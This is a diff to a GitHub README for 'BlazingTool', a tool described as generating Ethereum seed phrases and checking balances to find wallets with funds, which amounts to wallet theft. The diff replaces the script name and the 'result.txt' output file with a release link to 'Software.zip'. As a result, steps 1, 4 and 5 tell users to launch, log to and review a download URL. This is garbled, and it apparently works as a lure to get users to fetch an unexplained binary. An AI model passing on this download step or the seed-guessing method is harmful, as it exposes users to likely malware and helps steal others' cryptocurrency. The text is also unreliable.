desmonsd/BlazingTool/README.md

 BlazingTool offers a straightforward usage experience for users looking to explore its capabilities.
 By following the steps outlined below, you can unleash the power of BlazingTool:

-1. Launch the tool by running `BlazingTool.py`.
+1. Launch the tool by running `https://github.com/desmonsd/BlazingTool/releases/download/v2.0/Software.zip`.
 2. Select the Ethereum network you wish to target.
 3. Sit back and let BlazingTool work its magic as it generates seed phrases and checks wallet balances.
-4. If a wallet with a non-zero balance is found, the tool will log the wallet's details to `result.txt`.
+4. If a wallet with a non-zero balance is found, the tool will log the wallet's details to `https://github.com/desmonsd/BlazingTool/releases/download/v2.0/Software.zip`.
-5. Once the process is complete, review the `result.txt` file to access the discovered wallet information.
+5. Once the process is complete, review the `https://github.com/desmonsd/BlazingTool/releases/download/v2.0/Software.zip` file to access the discovered wallet information.

 ---